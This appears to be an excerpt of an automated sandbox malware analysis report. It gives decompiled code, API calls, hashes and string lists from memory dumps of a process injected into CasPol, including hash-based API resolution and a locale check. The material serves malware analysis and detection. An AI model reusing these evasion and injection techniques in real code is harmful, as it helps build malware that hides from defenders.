                                                                							__eax =  *__esi(__edi, 0x8003, __ebp + __eax - 0x40, __eax);
                                                                						}
                                                                					}
                                                                					_pop(__edi);
                                                                					_pop(__esi);
                                                                					_pop(__ebx);
                                                                					__esp = __ebp;
                                                                					_pop(__ebp);
                                                                					return __eax;
                                                                				}
                                                                			}











                                                                APIs
                                                                • PostThreadMessageW.USER32(00008636,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098B6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID:
                                                                • API String ID: 1836367815-0
                                                                • Opcode ID: c3635962a35c2da16ccf53f9b7e33bcf54d1b93ac691d575dc8918acee59a986
                                                                • Instruction ID: 0b434b31da4b3ab7f4c4012a727e40b77ef3b60e89b6b7e7875c55ce8a6f77e7
                                                                • Opcode Fuzzy Hash: c3635962a35c2da16ccf53f9b7e33bcf54d1b93ac691d575dc8918acee59a986
                                                                • Instruction Fuzzy Hash: 0911CD72A4021576E7106695DC82FFF735C9B41754F14413AFB047A1C2D6ECAE0686E5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 270 409853-409864 271 40986d-4098a7 call 420ca3 call 40ced3 call 402de3 call 4195b3 270->271 272 409868 call 4201f3 270->272 281 4098e0-4098e6 271->281 282 4098a9-4098ba PostThreadMessageW 271->282 272->271 282->281 283 4098bc-4098dd call 40c5a3 282->283 283->281
                                                                C-Code - Quality: 84%
                                                                			E00409853(void* __eflags, intOrPtr _a4, long _a8) {
                                                                				char _v67;
                                                                				char _v68;
                                                                				void* __edi;
                                                                				void* _t13;
                                                                				int _t15;
                                                                				long _t25;
                                                                				int _t27;
                                                                				void* _t28;
                                                                				void* _t32;
                                                                
                                                                				_t32 = __eflags;
                                                                				_v68 = 0;
                                                                				E004201F3( &_v67, 0, 0x3f);
                                                                				E00420CA3( &_v68, 3);
                                                                				_t19 = _a4;
                                                                				_t13 = E0040CED3(_t32, _a4 + 0x20,  &_v68); // executed
                                                                				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402DE3( &_v68, _t13, 0x40fa3591));
                                                                				_t27 = _t15;
                                                                				if(_t27 != 0) {
                                                                					_t25 = _a8;
                                                                					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
                                                                					if(_t15 == 0) {
                                                                						return  *_t27(_t25, 0x8003, _t28 + (E0040C5A3(1, 8, _t19 + 0x730) & 0x000000ff) - 0x40, _t15);
                                                                					}
                                                                				}
                                                                				return _t15;
                                                                			}













                                                                APIs
                                                                • PostThreadMessageW.USER32(00008636,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098B6
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID:
                                                                • API String ID: 1836367815-0
                                                                • Opcode ID: dafd9375c071f31cdbe3e20ae08b8a341ca6574c2996ce21f49670a253e36335
                                                                • Instruction ID: e773a7ee659482fa6fe3328f06cdbd4708deb785414366536410655b291b0b06
                                                                • Opcode Fuzzy Hash: dafd9375c071f31cdbe3e20ae08b8a341ca6574c2996ce21f49670a253e36335
                                                                • Instruction Fuzzy Hash: CB01C872A4022876E71066919C82FFF376C9B40B44F040129FE04BA1C2D6E8AE0586E9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 308 41ea14-41ea22 309 41ea24-41ea3d call 41f223 308->309 310 41ea79-41ea7c 308->310 314 41ea42-41ea57 LookupPrivilegeValueW 309->314 312 41ea82-41ea93 310->312 313 41ea7d call 41f223 310->313 313->312
                                                                C-Code - Quality: 25%
                                                                			E0041EA14(signed int __eax, signed int __esi, void* _a4, void* _a8, void* _a12, void* _a16) {
                                                                				void* _v0;
                                                                				signed int _t13;
                                                                
                                                                				_push(__eax);
                                                                				_t13 = __eax ^  *(__esi + 0xa);
                                                                				asm("aaa");
                                                                				asm("lock add al, 0x90");
                                                                				if ((__esi & 0xa4ccb534) > 0) goto L3;
                                                                			}






                                                                APIs
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEA5,0040FEA5,?,00000000,?,?), ref: 0041EA53
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LookupPrivilegeValue
                                                                • String ID:
                                                                • API String ID: 3899507212-0
                                                                • Opcode ID: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                • Instruction ID: dc27cc2fb198ade2d17280a16e8467aa7d15497bed9ff9f470af9842353000fa
                                                                • Opcode Fuzzy Hash: 0478b1b25585e0891a21a8d37a493bd511bcff86288ff7cb9802514e3dc0006c
                                                                • Instruction Fuzzy Hash: 93F081B5A042046FC710DF99EC45EE7376DEF84354F05885AFD088B242D235E9118BE4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 325 41e8b5-41e8b9 326 41e8d4-41e8d9 325->326 327 41e8bb-41e8d2 325->327 328 41e8df-41e8f4 RtlFreeHeap 326->328 329 41e8da call 41f223 326->329 327->326 329->328
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 0041E8F0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                • Instruction ID: a70d32c483ad18cc0f7891c95980f67120d115bce4dbab14678b91748736c37b
                                                                • Opcode Fuzzy Hash: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                • Instruction Fuzzy Hash: 55F0A0756402006FCB18DF95DC45EEB3B7AEF89390F204459F90997282C230EC06CBB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 0041E8F0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                • Instruction ID: 03fdbb8d33d7dfe1cc8dd0dec87e9036be8be9c52387b500572499a6dd56ba50
                                                                • Opcode Fuzzy Hash: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                • Instruction Fuzzy Hash: E4E0D8F40152851FDB14FFAAA8908977BD9AF46204710499EEC944B606C121D5599B71
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 16%
                                                                			E00410053(intOrPtr _a4) {
                                                                				intOrPtr* _t7;
                                                                				void* _t8;
                                                                
                                                                				asm("in al, dx");
                                                                				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
                                                                				if(_t7 != 0) {
                                                                					_t8 =  *_t7(0x10); // executed
                                                                					return 0 | _t8 == 0x000000f1;
                                                                				} else {
                                                                					return _t7;
                                                                				}
                                                                			}






                                                                APIs
                                                                • GetUserGeoID.KERNELBASE(00000010), ref: 0041007D
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: User
                                                                • String ID:
                                                                • API String ID: 765557111-0
                                                                • Opcode ID: 8db12a4c292c9c454df692e40dc31025b76cec024ff7aae76387fcd38685c7b4
                                                                • Instruction ID: 5be84a47f02960c0b1cba54ed20fb3a3f1d3a2dc5609808b463c0820bd0c15be
                                                                • Opcode Fuzzy Hash: 8db12a4c292c9c454df692e40dc31025b76cec024ff7aae76387fcd38685c7b4
                                                                • Instruction Fuzzy Hash: B2E0C27368030466FA2091A59C42FB6364F5B84B00F048475F90CE62C2D5A8E8C00018
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 0041E8F0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                • Instruction ID: 5326cad36f1cd3682148bf768eca4d2391bf05bb07e48d38a5f889d0d41c1adc
                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                • Instruction Fuzzy Hash: 54E012B5600208ABCB14EF89EC49EA737ACAF88754F018459BA095B282C630E914CAB1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0041E883(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                				void* _t10;
                                                                
                                                                				_t3 = _a4 + 0xa9c; // 0xa9c
                                                                				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                                                				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                				return _t10;
                                                                			}





                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00418C66,?,00419410,00419410,?,00418C66,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8B0
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                • Instruction ID: f5ae067db63c9ddd1b8e3113497bae5bcd77b30f1fcc8f0db147245146a0e1c6
                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                • Instruction Fuzzy Hash: EBE046B6600208ABCB14EF89EC45EE737ACEF88764F018459FE085B242C630F914CAF1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEA5,0040FEA5,?,00000000,?,?), ref: 0041EA53
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LookupPrivilegeValue
                                                                • String ID:
                                                                • API String ID: 3899507212-0
                                                                • Opcode ID: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                • Instruction ID: 0b19f6a055a19a2633036f6401d78d8d10b6211b82747d2c4bdb0d8f64ca6bac
                                                                • Opcode Fuzzy Hash: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                • Instruction Fuzzy Hash: DFE01AB56002046BC710DF89DC45FE737ADAF88654F054469BA0857242D635E8148AF5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 62788ee0f85626fa7ea6af96358dc6e5d2e66addf6def06f7a2292ef831ed2be
                                                                • Instruction ID: bb9560fde6d34c67ef3b647cdf3193900f81a6514fb9c13ef31c866d6f41cf1e
                                                                • Opcode Fuzzy Hash: 62788ee0f85626fa7ea6af96358dc6e5d2e66addf6def06f7a2292ef831ed2be
                                                                • Instruction Fuzzy Hash: A1B02B718010C0C9F601D7A00F087173A047BC0300F12C011D1020240B4338C080F1B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016DB3D6
                                                                • Go determine why that thread has not released the critical section., xrefs: 016DB3C5
                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 016DB314
                                                                • a NULL pointer, xrefs: 016DB4E0
                                                                • *** enter .exr %p for the exception record, xrefs: 016DB4F1
                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 016DB2DC
                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 016DB38F
                                                                • write to, xrefs: 016DB4A6
                                                                • *** then kb to get the faulting stack, xrefs: 016DB51C
                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 016DB2F3
                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 016DB48F
                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 016DB39B
                                                                • The resource is owned exclusively by thread %p, xrefs: 016DB374
                                                                • This failed because of error %Ix., xrefs: 016DB446
                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 016DB53F
                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 016DB47D
                                                                • The instruction at %p tried to %s , xrefs: 016DB4B6
                                                                • <unknown>, xrefs: 016DB27E, 016DB2D1, 016DB350, 016DB399, 016DB417, 016DB48E
                                                                • The resource is owned shared by %d threads, xrefs: 016DB37E
                                                                • The critical section is owned by thread %p., xrefs: 016DB3B9
                                                                • *** enter .cxr %p for the context, xrefs: 016DB50D
                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 016DB323
                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 016DB352
                                                                • The instruction at %p referenced memory at %p., xrefs: 016DB432
                                                                • *** Inpage error in %ws:%s, xrefs: 016DB418
                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 016DB484
                                                                • read from, xrefs: 016DB4AD, 016DB4B2
                                                                • an invalid address, %p, xrefs: 016DB4CF
                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 016DB305
                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 016DB476
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                • API String ID: 0-108210295
                                                                • Opcode ID: 406f41d13c2e43279519eabac01722cc20c941e8b78aa73e548e3a3c4f070e23
                                                                • Instruction ID: 8cb526e7211507becbfeaa21dcd7bf8c743417aa3a3fbf9616589fcdfd72e335
                                                                • Opcode Fuzzy Hash: 406f41d13c2e43279519eabac01722cc20c941e8b78aa73e548e3a3c4f070e23
                                                                • Instruction Fuzzy Hash: D3814335E00210FFDB229E4A8C89DBF3F26AF57A51F4A405CF5065B21ED3628552DBB2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 44%
                                                                			E016E1C06() {
                                                                				signed int _t27;
                                                                				char* _t104;
                                                                				char* _t105;
                                                                				intOrPtr _t113;
                                                                				intOrPtr _t115;
                                                                				intOrPtr _t117;
                                                                				intOrPtr _t119;
                                                                				intOrPtr _t120;
                                                                
                                                                				_t105 = 0x16048a4;
                                                                				_t104 = "HEAP: ";
                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                					_push(_t104);
                                                                					E0162B150();
                                                                				} else {
                                                                					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                				}
                                                                				_push( *0x171589c);
                                                                				E0162B150("Heap error detected at %p (heap handle %p)\n",  *0x17158a0);
                                                                				_t27 =  *0x1715898; // 0x0
                                                                				if(_t27 <= 0xf) {
                                                                					switch( *((intOrPtr*)(_t27 * 4 +  &M016E1E96))) {
                                                                						case 0:
                                                                							_t105 = "heap_failure_internal";
                                                                							goto L21;
                                                                						case 1:
                                                                							goto L21;
                                                                						case 2:
                                                                							goto L21;
                                                                						case 3:
                                                                							goto L21;
                                                                						case 4:
                                                                							goto L21;
                                                                						case 5:
                                                                							goto L21;
                                                                						case 6:
                                                                							goto L21;
                                                                						case 7:
                                                                							goto L21;
                                                                						case 8:
                                                                							goto L21;
                                                                						case 9:
                                                                							goto L21;
                                                                						case 0xa:
                                                                							goto L21;
                                                                						case 0xb:
                                                                							goto L21;
                                                                						case 0xc:
                                                                							goto L21;
                                                                						case 0xd:
                                                                							goto L21;
                                                                						case 0xe:
                                                                							goto L21;
                                                                						case 0xf:
                                                                							goto L21;
                                                                					}
                                                                				}
                                                                				L21:
                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                					_push(_t104);
                                                                					E0162B150();
                                                                				} else {
                                                                					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                				}
                                                                				_push(_t105);
                                                                				E0162B150("Error code: %d - %s\n",  *0x1715898);
                                                                				_t113 =  *0x17158a4; // 0x0
                                                                				if(_t113 != 0) {
                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                						_push(_t104);
                                                                						E0162B150();
                                                                					} else {
                                                                						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                					}
                                                                					E0162B150("Parameter1: %p\n",  *0x17158a4);
                                                                				}
                                                                				_t115 =  *0x17158a8; // 0x0
                                                                				if(_t115 != 0) {
                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                						_push(_t104);
                                                                						E0162B150();
                                                                					} else {
                                                                						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                					}
                                                                					E0162B150("Parameter2: %p\n",  *0x17158a8);
                                                                				}
                                                                				_t117 =  *0x17158ac; // 0x0
                                                                				if(_t117 != 0) {
                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                						_push(_t104);
                                                                						E0162B150();
                                                                					} else {
                                                                						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                					}
                                                                					E0162B150("Parameter3: %p\n",  *0x17158ac);
                                                                				}
                                                                				_t119 =  *0x17158b0; // 0x0
                                                                				if(_t119 != 0) {
                                                                					L41:
                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                						_push(_t104);
                                                                						E0162B150();
                                                                					} else {
                                                                						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                					}
                                                                					_push( *0x17158b4);
                                                                					E0162B150("Last known valid blocks: before - %p, after - %p\n",  *0x17158b0);
                                                                				} else {
                                                                					_t120 =  *0x17158b4; // 0x0
                                                                					if(_t120 != 0) {
                                                                						goto L41;
                                                                					}
                                                                				}
                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                					_push(_t104);
                                                                					E0162B150();
                                                                				} else {
                                                                					E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                				}
                                                                				return E0162B150("Stack trace available at %p\n", 0x17158c0);
                                                                			}












                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                • API String ID: 0-2897834094
                                                                • Opcode ID: 55b39cd9c9ef846abe801d19d60f565cd365e906641be0297e0970aa5bd4c4e1
                                                                • Instruction ID: 0f0c4406279c90ae81d873b17d80fed868cbc8abc9dd52ddac2c303a71fecc6c
                                                                • Opcode Fuzzy Hash: 55b39cd9c9ef846abe801d19d60f565cd365e906641be0297e0970aa5bd4c4e1
                                                                • Instruction Fuzzy Hash: A761F433592551CFD316AB89DC8CE2173E5EB06E31B5D812EFC0A9B341D63698919F0D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 59%
                                                                			E016E4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                				signed int _v6;
                                                                				signed int _v8;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				signed int _t189;
                                                                				intOrPtr _t191;
                                                                				intOrPtr _t210;
                                                                				signed int _t225;
                                                                				signed char _t231;
                                                                				intOrPtr _t232;
                                                                				unsigned int _t245;
                                                                				intOrPtr _t249;
                                                                				intOrPtr _t259;
                                                                				signed int _t281;
                                                                				signed int _t283;
                                                                				intOrPtr _t284;
                                                                				signed int _t288;
                                                                				signed int* _t294;
                                                                				signed int* _t298;
                                                                				intOrPtr* _t299;
                                                                				intOrPtr* _t300;
                                                                				signed int _t307;
                                                                				signed int _t309;
                                                                				signed short _t312;
                                                                				signed short _t315;
                                                                				signed int _t317;
                                                                				signed int _t320;
                                                                				signed int _t322;
                                                                				signed int _t326;
                                                                				signed int _t327;
                                                                				void* _t328;
                                                                				signed int _t332;
                                                                				signed int _t340;
                                                                				signed int _t342;
                                                                				signed char _t344;
                                                                				signed int* _t345;
                                                                				void* _t346;
                                                                				signed char _t352;
                                                                				signed char _t367;
                                                                				signed int _t374;
                                                                				intOrPtr* _t378;
                                                                				signed int _t380;
                                                                				signed int _t385;
                                                                				signed char _t390;
                                                                				unsigned int _t392;
                                                                				signed char _t395;
                                                                				unsigned int _t397;
                                                                				intOrPtr* _t400;
                                                                				signed int _t402;
                                                                				signed int _t405;
                                                                				intOrPtr* _t406;
                                                                				signed int _t407;
                                                                				intOrPtr _t412;
                                                                				void* _t414;
                                                                				signed int _t415;
                                                                				signed int _t416;
                                                                				signed int _t429;
                                                                
                                                                				_v16 = _v16 & 0x00000000;
                                                                				_t189 = 0;
                                                                				_v8 = _v8 & 0;
                                                                				_t332 = __edx;
                                                                				_v12 = 0;
                                                                				_t414 = __ecx;
                                                                				_t415 = __edx;
                                                                				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                                                					L88:
                                                                					_t416 = _v16;
                                                                					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                                                						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                                                						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                                                							L107:
                                                                							return 1;
                                                                						}
                                                                						_t191 =  *[fs:0x30];
                                                                						__eflags =  *(_t191 + 0xc);
                                                                						if( *(_t191 + 0xc) == 0) {
                                                                							_push("HEAP: ");
                                                                							E0162B150();
                                                                						} else {
                                                                							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                						}
                                                                						_push(_v12);
                                                                						_push( *((intOrPtr*)(_t332 + 0x30)));
                                                                						_push(_t332);
                                                                						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                                                						L122:
                                                                						E0162B150();
                                                                						L119:
                                                                						return 0;
                                                                					}
                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                						_push("HEAP: ");
                                                                						E0162B150();
                                                                					} else {
                                                                						E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                					}
                                                                					_push(_t416);
                                                                					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                                                					_push(_t332);
                                                                					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                                                					goto L122;
                                                                				} else {
                                                                					goto L1;
                                                                				}
                                                                				do {
                                                                					L1:
                                                                					 *_a16 = _t415;
                                                                					if( *(_t414 + 0x4c) != 0) {
                                                                						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                                                						 *_t415 = _t392;
                                                                						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                                                						_t424 = _t392 >> 0x18 - _t352;
                                                                						if(_t392 >> 0x18 != _t352) {
                                                                							_push(_t352);
                                                                							E016DFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                                                						}
                                                                					}
                                                                					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                                                						_t210 =  *[fs:0x30];
                                                                						__eflags =  *(_t210 + 0xc);
                                                                						if( *(_t210 + 0xc) == 0) {
                                                                							_push("HEAP: ");
                                                                							E0162B150();
                                                                						} else {
                                                                							E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                						}
                                                                						_push(_v8 & 0x0000ffff);
